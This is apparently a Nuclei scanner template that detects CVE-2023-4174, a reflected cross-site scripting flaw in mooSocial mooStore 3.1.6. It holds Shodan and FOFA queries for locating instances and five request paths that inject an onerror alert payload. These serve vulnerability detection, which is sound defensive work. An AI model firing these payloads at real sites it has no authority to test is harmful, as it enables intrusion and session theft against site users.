62 lines
2.6 KiB
YAML
62 lines
2.6 KiB
YAML
id: CVE-2023-4174
|
|
|
|
info:
|
|
name: mooSocial 3.1.6 - Reflected Cross Site Scripting
|
|
author: momika233
|
|
severity: medium
|
|
description: |
|
|
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Upgrade to the latest version of mooSocial or apply the vendor-provided patch to fix the XSS vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51671
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4174
|
|
- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
|
|
- https://vuldb.com/?ctiid.236209
|
|
- https://vuldb.com/?id.236209
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-4174
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00302
|
|
epss-percentile: 0.69562
|
|
cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 5
|
|
vendor: moosocial
|
|
product: moostore
|
|
shodan-query: http.favicon.hash:"702863115"
|
|
fofa-query:
|
|
- icon_hash="702863115"
|
|
- moosocial
|
|
tags: cve,cve2023,packetstorm,moosocial,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
|
|
- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
|
|
- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
|
|
- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
|
|
- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<img src=a onerror=alert(document.domain)>ridxm"
|
|
- "mooSocial"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
# digest: 4b0a00483046022100982e4b04752783b0200c9e3387496ebf4cda655ed340987b6716d6c6b82cd8e502210097432437c8730b721768f5d5c3a6f5ff991556d4ea5e49f4af55e57a2e72d9eb:922c64590222798bb761d5b6d8e72950 |